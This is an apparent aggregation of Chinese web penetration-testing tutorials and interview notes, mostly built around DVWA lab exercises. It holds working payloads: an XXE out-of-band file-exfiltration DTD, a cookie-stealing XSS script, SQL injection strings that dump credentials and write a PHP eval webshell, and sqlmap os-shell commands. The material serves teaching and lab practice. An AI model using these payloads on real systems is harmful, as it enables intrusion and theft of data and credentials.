精华内容
下载资源
问答
  • 渗透的基本流程 渗透一般分为如下九步 1.明确目标 要清楚自己扫描的范围,不做超出自己许可之外的扫描,如果有的操作可能引起业务的中断,药剂师联系客户 2.分析风险,获得授权 在扫描开始前要撰写扫描许可书,经过...

    渗透的基本流程

    渗透一般分为如下九步

    1.明确目标 要清楚自己扫描的范围,不做超出自己许可之外的扫描,如果有的操作可能引起业务的中断,药剂师联系客户

    2.分析风险,获得授权 在扫描开始前要撰写扫描许可书,经过客户方授予权利后才可以进行扫描

    3.信息收集 搜集目标近可能多的信息,对网站的基本情况有一个了解,常用SpiderFoot等工具进行搜集

    4.漏洞探测(手动&自动)运用各种漏扫工具可以实现对漏洞的探测,也可以从网上查看系统所对应的漏洞信息。

    5.漏洞验证 模拟漏洞所产生的危害,看是否会影响到网站的正常运行,

    6.信息分析 试着绕过各种防御机制,对各种常见漏洞进行测试

    7.利用漏洞,获取数据 对漏洞危害造成的危害进行测试,攻击完毕清理相应的日志

    8.信息整理 对攻击过程中的思路和代码进行整理

    9.形成报告 整理好漏洞的危害和对应的处理方法

    简述xss利用方法及这么利用的造成的后果;

    1反射型

    利用方法:通过构造恶意链接,当用户点击链接,就触发了 xss

    后果:用户的信息被窃取,模拟用户进行一些操作

    2存储型,

    利用方法:恶意脚本存储到客户端或者服务端的数据库中

    后果:在用户完全不知情的情况下,窃取用户的敏感信息

    3 DOM

    利用方法:文档对象模型,客户端脚本处理逻辑导致的安全问题

    后果:客户端上的JavaScript脚本可以访问浏览器的DOM并修改页面的内容,不依赖服务器的数据,直接从浏览器端获取数据并执行。

    xxe漏洞利用方法

    首先明确 band-xee 和 普通的 xee的区别在于服务器进行了过滤或者展示限制,以至于在利用通用实体的时候回显数据失败

    所以利用的思路即是找一个带外数据通道来显未数据,通过参数实体引用,发送一个http请求到我们服务器,然后观察我们服务的日志:

    首先在自己的服务器建一个DTD的数据格式文件。其内容为:

    <!ENTITY %file SYSTEM "file:///etc/passwd">

    <!ENTITY %request “<!ENTITY foo SYSTEM ‘http://自己的服务器地址/id=%file;’>”>

    %request;
    POST数据增加:

    Content-Type: text/xml

    <?xml version="1.0"?>

    <!DOCTYPE xxe SYSTEM "http://自己的ip/evil.dtd">

    <xxe>foo</xxe>

    此时会在部署好的服务器日志上生成一条请求记录

    继续修改为

    <?xml version="1.0">

    <!DOCTYPE xxe SYSTEM "http://10.108.41.62:8000/evil.dtd">

    <xxe>&foo;</xxe>

    Foo对应自己dtd文件中的foo

    在自己的服务器日志上就可以看到访问对应位置文件的回显,band-xss利用成功。

    你知道的所有ssrf利用方式,能用来做什么;

    1 对内网,外网的web应用进行攻击(get提交)

    2 利用邮件系统的漏洞,接受邮件服务器的地址

    3 利用file协议读取本地文件等

    4 对内网,本地运行的程序进行溢出攻击等

    5 对外网服务器所在内网,进行本地端口扫描,获取banner信息

    6 测试运行在内网或本地的应用程序

    天眼发现webshell上传,怎么排查?有哪些可能?后续需要什么操作?7 ssrf常见的绕过方式

    IP地址转换进制 添加端口 利用短地址进行302跳转(192.168.1.1.xip.ip会自动重定向到192.168.1.1) 利用句号等

    能干什么:外网探测或者攻击内网服务。

    Java反序列化漏洞利用步骤与原理

    原理:将Java应用中要传输的数据(数据进行过特殊的构造)反序列化后产生非预期的对象,这个对象在产生的过程中可能导致任意代码的执行

    1 确定反序列化的输入点

    具体方法就是找到readObject这个方法的位置

    2 生成需要的特殊反序列化的payload

    3 提交payload

    描述你对session的理解;

    Session的作用是在服务器端存储用户的一些数据,可以打一个比方在逛某宝的时候,逛到最后在购物车中有一大堆商品,某宝就相当于自己的应用程序,购物车就是session

    cookie相对应session本身就是建立在从cookie的基础上,禁用cookiesession就不可用了,cookie存储在本地session存储在服务器

    天眼发现webshell上传,怎么排查?有哪些可能?后续需要什么操作?

    排查:首先找到上传webshellip,对相同ip和同时间的攻击行为进行分析,判断出攻击者是如何将webshell 上传到服务器的(sql注入&文件上传。。。)判断出并找出一条完整的攻击链,然后在分析响应体,看攻击是否成功。

    可能:

    1 使用文件上传上传webshell

    2 使用一句话木马,用中国菜刀连接

    3 利用命令执行漏洞传webshell

    4 用户本身进行的webshell连接

    后续操作:

    首先要向客户询问,再进过客户的允许下先禁掉对应ip,然后将响应体的内容再自己的浏览器上执行以下看泄露了什么样的信息,最后在把相应路径下的webshell删除(做好备份的前提下),最后将相应的代码和防护意见整理报告上交客户

    展开全文
  • web渗透的思路

    2019-10-10 22:56:20
    服务器的相关信息(真实ip,系统类型,版本,开放端口,waf等)查看服务器的信息我们可以测试是否存在已知的漏洞,比如iis,apache,nginx,tomcat等的web中间件的通用漏洞 网站指纹识别(cms,cdn...

    我们在做测试之前脑子里面一定要思路健全,不管是遇到大型项目还是针对型测试一个站,我们的思路都是很重要的。

    信息收集:

    信息收集的重要性不多讲了,这里讲主要需要收集那些信息:

    服务器的相关信息(真实ip,系统类型,版本,开放端口,waf等)查看服务器的信息我们可以测试是否存在已知的漏洞,比如iis,apache,nginx,tomcat等的web中间件的通用漏洞

    网站指纹识别(cms,cdn,证书等)dns记录

    whois信息(姓名,备案,邮箱,电话反查)

    子域名收集,旁站,c段

    googlehack语法针对话语法收集

    扫描网站的目录结构,爆后台,网站banner,测试文件,备份等敏感文件泄露

    传输协议,通用漏洞,github信息泄露

    漏洞挖掘

    1.浏览网站,先看网站的规模,功能,特点

    2.端口,弱口令,目录扫描,对响应的端口进行漏洞探测,比如rsync,心脏出血,mysql,ftp,ssh,弱口令等

    3.测试xss,sql注入,csrf,ssrf,目录遍历,文件上传,命令执行,xxe,未授权访问,重放攻击,服务器漏洞检测,配套使用漏洞检测工具

    漏洞利用及权限维持:

    mysq提权,serv-u提权,oracle提权

    windows溢出提权

    linux脏牛,内核漏洞提权

     

    展开全文
  • 1、熟练掌握Kali操作系统的使用2、熟练掌握metasploit框架进行渗透测试3、熟练掌握SQL注入的原理以及绕过技巧。4、每章节课时都有2小时,建议每天学习1章节,然后充分练习、实践、总结。
  • Web服务通信原理目录一、基本知识介绍1.常见的服务器系统2. 绝对路径与相对路径3.CMD命令(伪DOS)win+R4.网络方面二、网页浏览流程1.引入库2.读入数据三、常见的Web容器 目录 一、基本知识介绍 1.常见的服务器...
      
    


    目录

    在这里插入图片描述

    一、基本知识介绍

    1.常见的服务器系统

    • 服务器:就是一台电脑运行了服务(服务器24小时不关机、性能强大、且有独立公网IP)
    • 系统:操作系统
    • 服务器系统:针对于服务器的操作系统(内置了很多服务器才用得到的东西)
    • 常见的类型

    Windows Server(服务器定制版) =》 Windows系统
    Linux =》安装系统
    MAC系统 =》苹果 (性价比低)

    • 区别

    Liunx优势:对硬件性能要求低,大部分的Liunx只有命令行。

    Windws优势:界面和普通的Windows一样,易上手。
    劣势:对硬件性能要求高、容易卡

    • 区分方法

    1.看盘符、路径的分别

    windows(C:\xxx\xxx)
    Liunx:(/home/xxx/xxxx)

    2.路径

    windows(不分大小写)
    Liunx(区分大小写)

    2. 绝对路径与相对路径

    1. 路径
      文件、文件夹在磁盘中的位置
    2. 绝对路径
      参考系是根目录 C:\xxx\xxx\xxx\xxx(不可变)
    3. 相对路径
      先对于某个文件夹存在的路径 ./…/
      网站开发一般使用相对路径(如果访问一个网站,图片显示不出来,大概率是使用了绝对路径)
      ./ (当前目录)
      …/(上级目录)

    3.CMD命令(伪DOS)win+R

    ipconfig 查看本机ip地址 net user admin xxxxx 修改账户密码
    (提升权限:以管理员权限运行 最高权限:SYSTEM>admintrators>user)

    dir 查看当前文件夹目录

    cd 跳到XXX目录 eg:cd …/ (跳到上级目录)

    shutdown -t 0 -s 关机

    盘符: 换盘符

    tasklist 查看进程 (拿到权限没有图形化界面,查看进程常用方法)

    taskkill 结束进程

    4.网络方面

    IP:正统定义:互联网协议地址,缩写为IP,是分配给用户上网使用的网络协议的设备的数字标签)(地址)

    公网ip互联网上的地址
    查看公网ip : 百度ip
    内网ip内部的地址(同一个路由器)
    查看内网ip : ipconfig

    (不知道是什么ip,直接百度搜,会告诉是公网还是内网)

    如果在自己电脑上搭建一个网站,别人能访问到吗?
    不一定,可以访问到对方电脑,能否访问到网站,取决于是否在路由器上设置过。
    正常情况下,内到外 – 不防护 ; 外到内 — 防护

    DNS协议:(域名和ip的对应的表格,单向—域名只能转IP)
    解析域名和IP的对应关系。
    eg: www.baidu.com -> 14.215.177.39

    域名:
    顶级域名:baidu.com (花钱买)
    二级域名:www.baidu.com(自己生成)
    三级域名:a.b.baidu.com(自己生成)
    多级域名:a.b.c.d.baidu.com(自己生成)
    任何域名都可以指向不同的ip

    端口:(门)1-65535端口
    对应服务:(每个不同的服务会对应不同的端口)
    80:网站
    3389:远程桌面
    xxxxx

    查看端口:

    netstart-ano
    

    监听状态表示端口开放

    HTTP协议:超文本传输协议( 任何网站都是http、https协议 )
    HTTP:访问网站的协议。
    HTTPS:加密的HTTP。(更安全——加密SSL)

    HTTP协议我们来看看需要了解什么,我们拿一个HTTP通信数据包来讲解

    GET /?tn=62095104_26_oem_dg HTTP/1.1
    Host: baidu.com
    User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/69.0.3497.100 Safari/537.36
    

    GET 是请求方式 HTTP/1.1 是协议版本
    HOST是访问的域名
    User-Agent传参是传参告诉别人你的浏览器是什么,是什么系统呀。

    二、网页浏览流程

    1.1.1.1 baidu.com → 网关 →DNS表,qzone.qq.com→ IP web服务器

    一、用户在浏览器输入协议://域名,如 http://www.zkaq.org

    二、用户浏览器通过系统 → 向DNS服务器查询域名对应的IP地址

    三、用户浏览器向查询到的IP地址(Web服务器)发起HTTP请求(:// 前边是什么就是什么请求

    四、服务器分析用户请求,从中提取数据,处理后返回一个http响应

    五、浏览器收到响应后提取状态、协议编码、正文的有效信息,然后翻译成人类能够直观理解的图形界面并显示。

    三、常见的web容器

    WEB容器是什么呢?

    Web容器是可以向发出请求的浏览器提供文档的程序。
    WEB容器是一种被动程序:只有其他计算机发出的请求该容器时,容器才会响应
    Web容器的主要功能是存储,处理和传递网页给客户。客户端和服务器之间的通信使用超文本传输​​协议(HTTP)进行。交付的页面最常见的是HTML文档,除了文本内容之外,还可能包含图像,样式表和脚本。
    在这里插入图片描述在这里插入图片描述

    常见的web容器

    在这里插入图片描述

    展开全文
  • web渗透初学笔记

    万次阅读 多人点赞 2018-07-15 13:44:28
    web基础知识 前端漏洞:钓鱼、暗链、xss、点击劫持、csrf、url跳转 后端漏洞:sql注入、命令注入、文件上传、文件包含、暴力破解   例子 报文   熟悉状态码   目前流行的网站架构   ...

    web基础知识

    前端漏洞:钓鱼、暗链、xss、点击劫持、csrf、url跳转
    后端漏洞:sql注入、命令注入、文件上传、文件包含、暴力破解
    

     

    例子

    报文

     

    熟悉状态码

     

    目前流行的网站架构

     

    搭建phpstudy集成软件

     

    在PHPstudy的mySQL中操作SQL语法

    创建数据库  CREATE DATABASE my_db;

    查看数据库 SHOW databases;

    切换数据库 USE my_db;

    删除数据库 DROP DATABASE my_db;

    TIPS:分号作为语句的结束,程序中会自动补充

     

     

     

    web安全基础

    常见的安全事件

    篡改网页

    搜索引擎语法Site:domain(在某个域名或子域名下的网页)+Intitle:keyword(正文中含有关键词的网页)/Intitle:keyword(标题中含有关键词的网页)

    exa:keyword为hacked by:时往往能查到自己管理域名下被黑的网站

    ------------------------------------------------------------------------------------------------------------------------------------------------------------------

    暗链

    优化在搜索引擎里的排名

    不是为人准备,是为搜索引擎中的爬虫准备的。

    ------------------------------------------------------------------------------------------------------------------------------------------------------------------

    webshell

    获得管理权限后->上传webshell=(小/大)马=后门

    ------------------------------------------------------------------------------------------------------------------------------------------------------------------

    常见web漏洞

    XSS  Who stole my keys

    概念:黑客通过"html注入"篡改网页,插入了恶意脚本(即xss脚本),当用户在浏览网页时,实现控制用户浏览器行为的一种攻击方式。

    危害:盗取用户信息/钓鱼/制造蠕虫等

    三种类型 :存储型/反射型/DOM型

    存储型:攻击代码位置:数据库;输出:HTTP响应

    反射型:攻击代码位置:url        ;输出:HTTP响应。

    DOM型:攻击代码位置:url       ;输出:DOM节点。

     

    ------存储型演示------

    左管理端/右访问端

    上传xss脚本

    结果

    ------反射型演示------

    ------DOM型演示------

    不能通过查看源代码的方式找到xss脚本的位置,通过firebug可以。

    在源码中输入hash

    总结

    ------------------------------------------------------------------------------------------------------------------------------------------------------------------

    CSRF     who moved my cheese

    概念:利用用户已登陆的身份,在用户毫不知情的情况下,以用户的名义完成非法操作。

    危害:执行恶意操作(被转账/被发垃圾评论等)/制造蠕虫等

    黑客构造的恶意网页

    ------------------------------------------------------------------------------------------------------------------------------------------------------------------

    点击劫持

    概念:通过覆盖不可见的框架误导受害者点击而造成的攻击行为。利用iframe或者其他标签的属性。

    效果

    ------------------------------------------------------------------------------------------------------------------------------------------------------------------

    URL跳转

    概念

    header头跳转

    js跳转

    meta标签实现跳转

    ------------------------------------------------------------------------------------------------------------------------------------------------------------------

    SQL

    原理:数据和代码未分离,即数据当成了代码来执行

     

     

    一次SQL注入的过程

     

    SQL注入的必备条件

    1.可以控制输入的数据

    2.服务器要执行的代码拼接了控制的数据

     

    危害:获取数据库信息

                    管理员后台用户名和密码

                    获取其他数据库敏感信息:用户名/密码/手机号码/身份证/银行卡信息...

                    整个数据库:脱裤

            获取服务器权限

                    植入webshell,获取服务器后门

                    读取服务器敏感文件

                    万能密码

    ------------------------------------------------------------------------------------------------------------------------------------------------------------------            

    命令注入

    step:

    1.调用可执行系统命令的函数

    2.函数或函数参数可控(条件

    3.拼接注入命令

     

    & 拼接符,一次执行拼接的命令

    | 管道符,前面命令的输出作为后面命令的输入

     

    PHP执行命令的函数

    system/exec/shell_exec/eval......

     

    一个函数或函数参数都不可控的例子

    命令执行的结果跟DOS环境中一样

     

    一个参数可控的例子

    拼接过程。注:&符号需转义为%26

    ------------------------------------------------------------------------------------------------------------------------------------------------------------------

    文件操作漏洞

    文件上传漏洞

    1.可以上传可执行脚本

    2.脚本拥有执行权限

    任意文件下载漏洞

    1.未验证下载文件格式

    2.未限制请求的路径

    文件包含漏洞

    本地文件包含

    远程文件包含

    重要的两个参数:allow_url_fopen = On(是否允许打开远程文件);allow_url_include = On(是否允许包含远程文件);

     

    web安全工具

    代理抓包分析工具

    web漏洞扫描工具初级

    在线工具 

     

    传统web站点渗透测试基本步骤

    ------------------------------------------------------------------------------------------------------------------------------------------------------------------

    比较流行的代理抓包工具

    Burpsuite/charles/fiddler

    浏览器插件

    Advanced Cookie Manager/Firebug/HackBar/Proxy Switcher

    Firebug:网络与审查页面元素

    Hackbar:构造数据包

    Cookie Manager:修改Cookie值

    ------------------------------------------------------------------------------------------------------------------------------------------------------------------

    敏感文件探测

    部署python环境

    敏感文件:敏感文件对于网站来说,就像是网站(网站管理员)的秘密日记,这些文件没有被保护好被访问者发现了,就有可能暴露站点的脆弱性或保密数据。

    常见的”敏感文件“类型:

    网站管理后台(login.xx)/数据文件(.sql)/备份文件(.tar.gz)/webshell(.php?)/

    常用软件:御剑/add:用py自写字典生成器

    tips:判断站点脚本类型asp/php/aspx/jsp

            1.判断网站下index.xxx(xxx为asp/php等)类型是否存在

    ------------------------------------------------------------------------------------------------------------------------------------------------------------------

    漏扫工具

    AWVS/Netsparker/AppScan

    风险

    1. 对目标站点的误伤(高流量,请求了危险功能(如删除数据库)...)
    2. 漏扫的盲区:逻辑漏洞 

    ------------------------------------------------------------------------------------------------------------------------------------------------------------------

    SQL注入漏洞

    sqlmap获取

    发现和利用sql注入漏洞基本流程

    1.找到有数据库交互的功能页面(如:xxx/artist.php?artist=1    问号+参数)
    2.判断页面是否存在sql注入(artist=1'  报错存在注入)
    3.利用sql注入漏洞读取数据

    进行注入尝试:GET/POST

    sqlmap中level和risk参数的作用

     

     

     

    实战

    DVWA环境的部署

    1.下载DVWA到www目录下
    2.config文件下config.inc.php文件中的$_DVWA[ 'db_password' ]项改为自己mysql的密码
    3.访问localhost/dvwa路径/setup.php检测环境是否配置好
    4.访问localhost/dvwa路径/login.php     登陆名默认为admin/密码默认为password

    ===============================================================================================

    • 1.暴力破解

    辅助工具owasp zap(官网www.owasp.org)

    ===============================================================================================

    • 2.命令注入

    命令拼接符

    A&B简单拼接,AB无制约
    A&&BA执行成功,接着才能执行B
    A|BA的输出作为B的输入
    A||BA执行失败才会执行B

    技巧:不显示输出结果...

    ADD:DNS查询

    ===============================================================================================

    • 3.CSRF

    ==============low============

    HH-Tamperdata抓包  ->  Replay in browser ->  改包  ->构造js/html(包装url)

    ==============medium============

    HH-Tamperdata抓包  ->  Replay in browser ->  改包  ->构造html(Tamper Popup:改变referer)

    ==============high============

    ===============================================================================================

    • 4.文件包含

    ==============low============

    本地文件执行

    远程文件执行

    dvwa的host,远程执行文件成功

     

    ==============medium============

    本地文件执行

    远程文件执行

    dvwa的host,远程执行文件成功

     

    ==============high============

    本地文件执行

    远程文件执行

    phpinfo.txt内容

    dvwa的host,远程执行文件成功

     

    ===============================================================================================

    • 5.文件上传

    ==============low============

    cmd.php文件内容

    <?php  @eval($_GET['cmd']); ?>

     

     

     

    ==============medium============

    step1.proxy switcher&zap设置代理开启

    step2.两次抓包结果对比(right/wrong;zap)

    step3.不断用成功上传包的内容替换失败的位置,进行重放,然后看响应包的结果;确定文件类型被服务端限制

    step4修改文件类型->发送修改后的包->后续操作与low等级一样

     

    ==============high============

    制作"内涵图"

    cmd:copy R.jpg/b + W.txt/a 2.jpg

    W.txt内容

    除了借助文件包含漏洞,还可借助web容器解析漏洞

    如:nginx解析漏洞

    phpstudy切换->确认变量cgi.fix_pathinfo=1

    畸形解析

    xxx/xxx.php只要前一个文件存在,就会当成后面php文件的解析

     

    ==============impossible============

    文件重命名/文件压缩重生成/存储目录执行权限/存储目录与web分离

     

    ===============================================================================================

    • 6.SQL回显注入

    需检测到id参数sql注入

    http://10.240.138.212/DVWA-1.9/vulnerabilities/sqli/  ?id=1 &Submit#

    如果存在注入,则会报错并且把错误的信息展示出来

    You have an error in your SQL...

     

    三种注入POC;判断闭合方式

    ...where user_id = $id     =》     ...where user_id = 1 or 1024=1024

    ...where user_id =' $id'     =》     ...where user_id = '1' or '1024'='1024'

    ...where user_id = ''$id''     =》     ...where user_id = ''1'' or ''1024''=''1024''

    sql注入中通常需要闭合,如果yu'j语句比较复杂,则使用sql注释符闭合

    #     --空格      /**/

    #:与url中的#区分,常编码成%23

     

    查询之前需要确定查询字段数

    1' order by 25--     =》     ?id=1'+order+by+25--+

    再利用二分法查找

     

    ==============low============

    ------获取数据库的敏感信息------

    确定回显点

    ?id=xx'+union+select+1,2--+

    查询数据库版本/目录)

    ?id=xx'+union+select+@@version,@@datadir--+

    查询用户名/数据库名(查到数据库dvwa)

    ?id=xx'+union+select+user(),database()--+

    查询表名(查到表users)

    ?id=xx'+union+select+1,table_name+from+information_schema.tables+where+table_schema='dvwa'--+

    查询列名

    ?id=xx'+union+select+1,column_name+from+information_schema.columns+where+table_name='users'--+

    查询用户名/密码

    ?id=xx'+union+select+user,password+from+users--+

     

    ------获取系统的敏感信息------

    文件读取

    ?id=xx'+union+select+1,load_file("c:\\windows\\win.ini")--+

     

    ------控制服务器------

    写入webshell

    php一句话木马<?php @eval($_GET['cmd']) ?>

     

    前提:需知写入的地方,即木马放置的物理路径

    套路:引发异常,暴出物理路径

    1.构造错误的sql语句

    ?id=xx'+union+select+“xx”,"xx"+into+outfile+"xx"--+

    2.成功获取web目录

    D:\phpstudy\www\DVWA-1.9\vulnerabilities\sqli\source\low.php

    3.写入webshell

    ?id=xx'+union+select+"<?php @eval($_GET['cmd']) ?>","webshell"+into+outfile+'DVWA-1.9\\cmd.php'--+

    4.访问,成功写入

    5.成功读取

     

    sqlmap了解一下?

    登陆状态下

    攻击参数

    sqlmap -u "http://10.240.138.212/DVWA-1.9/vulnerabilities/sqli/  ?id=1 &Submit#" -p "id" --cookie "cookie参数" 

    查询用户和数据库

    qlmap -u "http://10.240.138.212/DVWA-1.9/vulnerabilities/sqli/  ?id=1 &Submit#" -p "id" --cookie "cookie参数"  --current-user --current-db

    查询表

    sqlmap -u "http://10.240.138.212/DVWA-1.9/vulnerabilities/sqli/  ?id=1 &Submit#" -p "id" --cookie "cookie参数"  -D dvwa --tables

    查询列名

    sqlmap -u "http://10.240.138.212/DVWA-1.9/vulnerabilities/sqli/  ?id=1 &Submit#" -p "id" --cookie "cookie参数" -D dvwa -T user --columns

    sqlmap -u "http://10.240.138.212/DVWA-1.9/vulnerabilities/sqli/  ?id=1 &Submit#" -p "id" --cookie "cookie参数" -D dvwa -T user -C "user,password" --dump

     

    上传webshell

    sqlmap -u "http://10.240.138.212/DVWA-1.9/vulnerabilities/sqli/  ?id=1 &Submit#" -p "id" --cookie "cookie参数" -D dvwa -T user -C "user,password" --os-shell

     

    ============medium============

    Tamper Data改包

    单引号转义:   利用hackbar上把数据库名(dvxa)HEX编码0x64767761   =》 重新发包

    sqlmap自动

    多了一个--data

    sqlmap.py -u "http://10.240.138.212/DVWA-1.9/vulnerabilities/sqli/ --data “id=1 &Submit#" -p "id" --cookie "cookie参数" 

    ==============high============

    手工相似

    sqlmap需要一些技巧

    多了--data--second-order

    sqlmap -u "http://10.240.138.212/DVWA-1.9/vulnerabilities/sqli/session-input.php(跳转后的页面) --data “id=1 &Submit#" -p "id" --cookie "cookie参数"  --second-order "http://10.240.138.212/DVWA-1.9/vulnerabilities/sqli/(原页面)"

     

    ===============================================================================================

    • 7.SQL盲注

    数据库的执行结果不会直接显示在页面上,页面的结果只会显示两种状态

     

    三种注入POC;判断闭合方式

    ...where user_id = $id     =》     ...where user_id = 1 and 1024=1025

    ...where user_id =' $id'     =》     ...where user_id = '1' and '1024'='1025'

    ...where user_id = ''$id''     =》     ...where user_id = ''1'' and ''1024''=''1025''

     

    先猜解长度

    1' and length(database()) >25 --     =》     ?id=1'+and+length(database()) >25+--+       利用二分法查找

    再猜解字符

    利用函数substr(expression,start,length)获取定义内的字符/子字符串   expresstion:原始字符串,start:子串开始位置,length子串长度

    利用函数ascii(string)获取第一个字符的ascii数值

    ?id=1'+and+ascii(substr(database(),1,1))>64+--+        二分法对每一个字符进行比对查找

    SQL盲注分:布尔型(以上这类)/延时型(以下这类)

    函数if(A,1,0) A为真返回1,为假返回0

    ?id=1'+and+sleep(if(length(database())=5,5,0))--+

    注:此外除了真假/延时,还有benchmark(count,expr)函数可利用

     

    sqlmap

    ==============low============

    同回显注入一样

    ==============medium============

    一样

    ==============high============

    失效

    Firebug分析:id写到了cookie中再提交

    sqlmap.py -u "http://10.240.138.212/DVWA-1.9/vulnerabilities/sqli_blind/ -p "id" --cookie "cookie参数" --lever 2

    注:lever>=2

    ==============impossible============

    检测了id数据类型,使用了预编译绑定id变量;

     

    ===============================================================================================

     

    • 8.xss

    客户端代码注入,通常注入代码是js脚本

    能弹窗,就说明存在xss

    --------------------------------------------------反射型-----------------------------------------------------------

    ==============low============

    建立一个cookie.php文件,放入数据库根目录下(localhost/)

    <?php
    $cookie=$_GET['cookie'];
    file_put_contents('cookie.txt',$cookie);
    ?>

    插入弹窗脚本

    <script>alert(1)</script>
    弹窗,说面存在xss

    替换成远程盗取cookie的语句

    <script>document.location='http://127.0.0.1/cookie.php?cookie='+document.cookie;</script>

    进行URL编码后即可在本地服务器指定位置(localhost/)下得到(hacked)用户的cookie

    跳转到登陆页面,更换cookie,直接访问首页(login.php  ->  index.php)

    ==============medium============

    <script>标签被过滤一次,所以构造

    <scr<script>ipt>alert(1)</script>

    tip:大小写混合<scRipT>

    ==============high============

    img标签<img scr="x" οnerrοr="alert(1)">                F12查看成功插入标签

    iframe标签<iframe οnlοad=alert(1)>                      F12查看成功插入标签

    ==============impossible============

    输入&"'<>    F12查看     &amp;&quot;'&lt;&gt;    除了单引号外其他符号都被编码

    查看源码htmlspecialchars函数过滤了(函数中默认不对‘编码,但’依然有xss的风险)

     

    --------------------------------------------------存储型-----------------------------------------------------------

    ==============low============

    前端限制:输入长度被限制

    TamperData绕过:直接改包

    查看结果:成功绕过限制。name和message都注入chen成功

    ==============medium============

    大小写混合

    name成功,message失败

    ==============high============

    img标签成功绕过

    name成功,message失败

    ==============impossible============

    单引号被转义为/‘,其他符号被编码

    mysql_real_escape_string()函数对引号转义,防止sql注入

     

    --------------------------------------------------修复-----------------------------------------------------------

    一是用户的输入:黑名单×白名单√

    二是服务端的输出:html编码/js转义

     

     

    END

    展开全文
  • webshell制作原理   webshell种类  一句话马(使用的最多)、小马、大马、打包马、脱裤马、、、   一句话:  介绍:短小精悍,并且功能强大、隐蔽性非常好,在入侵种始终扮演着非常重要的角色  ...
  • 开放端口等 控制受害者机器向其他网站发起攻击 结合其他漏洞,如CSRF漏洞,实施进一步作恶 提升用户权限,包括进一步渗透网站 传播跨站脚本蠕虫等 防御 前端输入过滤 对前端用户输入的内容进行检查,对于DOM型XSS...
  • web渗透测试/渗透工具kali 渗透原理 渗透前期(网络踩点、网络扫描、网络查点) 渗透中期(利用漏洞信息进行渗透攻击、获取权限) 渗透后期(后渗透维持攻击、文件拷贝、代码植入、痕迹擦除) 渗透测试定义 渗透...
  • Web渗透技术及实战案例解析 PDF 分享

    千次阅读 2019-07-14 15:20:31
             提取码:b9p1 ...WEB之困-现代WEB应用安全指南 黑客攻防技术宝典:系统实战篇(第2版) Android安全攻防权威指南 Python灰帽子 黑客与逆向工程师的P...
  • web渗透流程简述.pptx

    2021-05-12 11:15:52
    详细讲解了web渗透测试的步骤以及原理
  • WEB渗透面试(360)

    千次阅读 2019-12-05 20:32:01
    本文关键字:360渗透岗位面试 出自公众号:工程师江湖 一、前言 群友最近在一些大厂进行了面试,整理了一下题,发出来可以参考下。 360 面试的笔试题 如果存在 SQL 注入怎么判断不同的数据库。 (1)注释符判断 /*是...
  • web渗透常见漏洞总结

    千次阅读 2021-01-14 21:58:50
    1. 原理 SQL:结构化查询语言 所谓SQL注入,就是通过把SQL命令插入到Web表单递交或输入域名或页面请求的查询字符串,最终达到欺骗服务器执行恶意的SQL命令。 SQL注射能使攻击者绕过认证机制,完全控制远程服务器...
  • Web渗透(一)

    万次阅读 多人点赞 2018-11-20 19:53:17
    Web渗透经典流程 判断脚本系统,判断数据库类型——&gt;寻找注入点——&gt;猜解数据库表名——&gt;猜解字段名——&gt;猜解用户名和密码——&gt;寻找后台地址登录,获得网站管理权限(webshell...
  • 学习目标:掌握kali Linux渗透测试技巧、掌握常见漏洞检测及利用方法、全部学习完成后可就业渗透测试工程师、web安全工程师、安全运维工程师、漏洞挖掘工程师、安全驻场工程师等   特别提醒:本课程购买后可...
  • Web渗透信息收集篇

    千次阅读 2020-07-21 14:47:47
    信息收集是渗透测试的重要环节之一,是万里长征第一步,也是胜利会师最重要的一步。攻防皆有道,百战护山河。每次的攻防比赛让自己更加认清自己有多菜,也知道信息收集有多重要,所以老生常谈又对信息收集进行一遍...
  • Web安全-渗透基础

    万次阅读 多人点赞 2019-02-06 10:29:24
    渗透基本名词 1、WebShell WebShell就是以asp、php、jsp或者cgi等 网页文件形式存在的─种命令执行环境,也可以将其称做为─种网页后门 。黑客在入侵了─个网站后,通常会将这些asp或php后门文件与网站服务器WEB...
  • Web安全相关概念 熟悉基本概念(SQL注入、上传、XSS、CSRF、一句话木马等)。 1.通过关键字(SQL注入、上传、XSS、CSRF、一句话木马等)进行Google/SecWiki; 2.阅读《精通脚本黑客》,虽然很旧也有错误,但是入门...
  • 本篇文章分享实验吧CFT实战的题目,涉及WEB渗透和隐写术常见题型,包括“这是什么”、“天网管理系统”、“忘记密码”、“false”、“天下武功唯快不破”和“隐写术之水果、小苹果”。非常有意思的文章,作为在线...
  • Web安全相关概念 熟悉基本概念(SQL注入、上传、XSS、CSRF、一句话木马等)。 通过关键字(SQL注入、上传、XSS、CSRF、一句话木马等)进行Google/SecWiki; 阅读《精通脚本黑客》,虽然很久也有错误,但是入门...
  • web渗透总结

    2018-04-22 23:31:00
    web渗透作为一个应用技能,需要的知识体系繁杂,几乎囊括了整个IT行业。。。。。 需求技能: 1、前端 HTML/CSS/JS,了解前端的基础,至少熟悉常见的HTML标签和JS的常用框架 2、网络基础 TCP/IP...
  • 常见的web漏洞分类: SQL注入漏洞 文件上传漏洞 XSS 跨站脚本攻击 CSRF 跨站请求伪造攻击 文件包含漏洞 命令执行漏洞 代码注入攻击 逻辑漏洞 0x01 SQL注入漏洞 定义...
  • 从今天开始陆陆续续的会更新的一些自己从零开始学习web渗透测试的一些知识,希望对大家能够起到一些积极地作用! 让我来开始学习渗透到第一章吧! Web服务器通讯原理 首先嘛,我们要了解什么是服务器。 “服务器,...
  • 成为一名专业Web渗透工程师难吗?

    千次阅读 2020-09-10 19:39:24
    如今,Web 技术繁荣发展的同时,也带来了前所未有的安全挑战。有数据统计,所有黑客入侵...通过学习本课程,为你揭开Web黑客技术的神秘面纱,成为一名专业的Web渗透测试工程师。 理论讲解是本课程的独特亮点,也是本
  • web渗透测试笔记

    2020-05-11 12:38:38
    web渗透测试笔记一、渗透测试方法论 渗透测试是实施安全评估的具体手段,方法论是在制定、实施安全评估的方案时,需要遵循的规则、惯例和过程,人们在网络,应用和系统或者三者结合的情况时,不断的摸索各种务实的...
  • 包括但不限于Web渗透测试的前期准备、相关工具介绍(Burpsuite、sqlmap、Kali、tplmap、nmap等)、渗透测试基本思路、基本漏洞类型(SQL注入、SSTI、SSRF、CSRF、XSS)等,让零基础人群对渗透测试有所了解并能够在...
  • QQ 1285575001 Wechat M010527 技术交流 QQ群599020441 纪年科技aming
